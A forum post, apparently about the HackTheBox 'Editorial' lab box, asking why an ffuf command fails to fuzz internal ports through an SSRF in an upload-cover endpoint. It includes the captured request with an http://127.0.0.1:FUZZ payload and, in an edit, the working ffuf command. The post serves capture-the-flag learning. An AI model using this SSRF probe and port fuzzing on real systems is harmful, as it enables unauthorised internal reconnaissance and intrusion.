Hello everyone,
I’m having trouble fuzzing internal ports before launching an SSRF attack on the “Editorial” box. To do this, I’m fuzzing the entire request captured from Burp, saved to a text file named “request.txt”, which contains the following:
POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------283338384034137401052693891016
Content-Length: 363
Origin: http://editorial.htb
Connection: close
Referer: http://editorial.htb/upload
-----------------------------283338384034137401052693891016
Content-Disposition: form-data; name="bookurl"
http://127.0.0.1:FUZZ
-----------------------------283338384034137401052693891016
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream
-----------------------------283338384034137401052693891016--
And the FUFF command I am using goes like this:
ffuf -ac -request request.txt -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt:FUZZ -t 10
However, after running this command, I’m not getting any usable output. Every request seems to be erroring out, but I can’t pinpoint what’s exactly going wrong. Could someone help me figure out what I might be missing?
Thanks! <3
EDIT: I have managed to get it working with the following command:
ffuf -ac -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt:FUZZ -u http://editorial.htb/upload-cover -request request.txt
Apparently, the probable reason why it worked after specifying the URL manually is that when I use the -request flag only, ffuf doesn’t automatically extract the URL from the request file. In other words, the request file is most likely used to modify the body or headers of the request, but not the actual destination URL unless explicitly passed. That’s a bit strange but at least I have learned something new and useful from this failure.